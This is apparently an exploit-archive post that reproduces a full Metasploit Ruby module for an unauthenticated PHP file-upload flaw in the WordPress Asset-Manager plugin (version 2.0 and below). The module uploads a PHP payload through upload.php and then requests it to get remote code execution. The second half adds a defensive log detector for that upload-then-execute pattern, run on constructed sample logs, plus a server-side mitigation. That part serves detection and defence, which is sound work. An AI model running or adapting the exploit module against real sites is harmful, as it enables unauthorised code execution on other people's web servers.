WordPress Asset-Manager PHP File Upload Vulnerability

Posted 2012-12-31 09:22:33
This module, from the Metasploit exploit library, exploits a vulnerability found in version 2.0 and below of the Asset-Manager plugin for WordPress. The plugin allows PHP files to be uploaded: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body the plugin's upload handler expects
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The uploaded file lands in the plugin's temp directory and is requested directly
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end

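The module above leaves a two-step trace in the web server's access log: an unauthenticated POST to the plugin's upload.php, then a GET for a freshly uploaded .php file under wp-content/uploads/assets/temp/. The following detector is an added example written for this post; it is not part of the forum post or of the Metasploit module, and the access log lines it parses are constructed for illustration (IPs, file names and timestamps are made up). It correlates the two requests per client IP and rates a lone request for a .php file in the temp directory as a lower-severity hit, since the upload may have arrived in a log you do not see.

```ruby
# Added example: detect the upload-then-execute pattern of the Asset-Manager
# upload.php issue in Apache/nginx combined-format access logs.
# Not part of the original post or the Metasploit module. Sample log is constructed.
require 'time'

UPLOAD_HANDLER = %r{/wp-content/plugins/asset-manager/upload\.php}
TEMP_PHP       = %r{/wp-content/uploads/assets/temp/([^/\s?]+\.php)}

# Combined log format: ip - - [timestamp] "METHOD path HTTP/x" status bytes
LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# Constructed sample log: one client uploads and then fetches its file,
# another client only probes the temp directory.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [31/Dec/2012:09:20:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120
  203.0.113.5 - - [31/Dec/2012:09:20:07 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 43
  203.0.113.5 - - [31/Dec/2012:09:20:08 +0800] "GET /wordpress/wp-content/uploads/assets/temp/kqzwd.php HTTP/1.1" 200 0
  198.51.100.9 - - [31/Dec/2012:09:25:00 +0800] "GET /wordpress/wp-content/uploads/assets/temp/old.php HTTP/1.1" 404 210
LOG

# Parse one log line into a hash, or nil if it does not match the format.
def parse_line(line)
  m = LINE_RE.match(line) or return nil
  {
    ip:     m[:ip],
    time:   Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method],
    path:   m[:path],
    status: m[:status].to_i
  }
end

# Walk the log once. A POST to the upload handler is remembered per client IP;
# a later GET for a .php under the temp directory from the same IP within
# `window` seconds is a high-severity alert, a GET with no matching upload
# is medium severity.
def detect_upload_exec(lines, window: 300)
  pending = Hash.new { |h, k| h[k] = [] }   # ip => [upload timestamps]
  alerts  = []
  lines.each do |raw|
    e = parse_line(raw) or next
    if e[:method] == 'POST' && e[:path] =~ UPLOAD_HANDLER
      pending[e[:ip]] << e[:time]
    elsif e[:method] == 'GET' && (m = TEMP_PHP.match(e[:path]))
      upload_at = pending[e[:ip]].find { |t| (e[:time] - t).between?(0, window) }
      alerts << {
        ip:          e[:ip],
        file:        m[1],
        status:      e[:status],
        severity:    upload_at ? 'high' : 'medium',
        uploaded_at: upload_at,
        executed_at: e[:time]
      }
    end
  end
  alerts
end

# Convenience entry point over the constructed sample log.
def run_sample
  detect_upload_exec(SAMPLE_LOG.lines)
end

if __FILE__ == $0
  run_sample.each do |a|
    puts "#{a[:severity].upcase} #{a[:ip]} fetched #{a[:file]} (HTTP #{a[:status]})" \
         "#{a[:uploaded_at] ? " after upload at #{a[:uploaded_at]}" : ''}"
  end
end
```

On the constructed sample this yields a high-severity alert for 203.0.113.5 (upload at 09:20:07, execution at 09:20:08) and a medium one for 198.51.100.9, whose probe returned 404. The correlation key here is the client IP, which is adequate for a direct connection but should be replaced by the X-Forwarded-For value when the site sits behind a proxy or CDN. As a mitigation independent of detection, refusing to execute .php files anywhere under wp-content/uploads at the web server level removes the second step of this chain even if an upload succeeds.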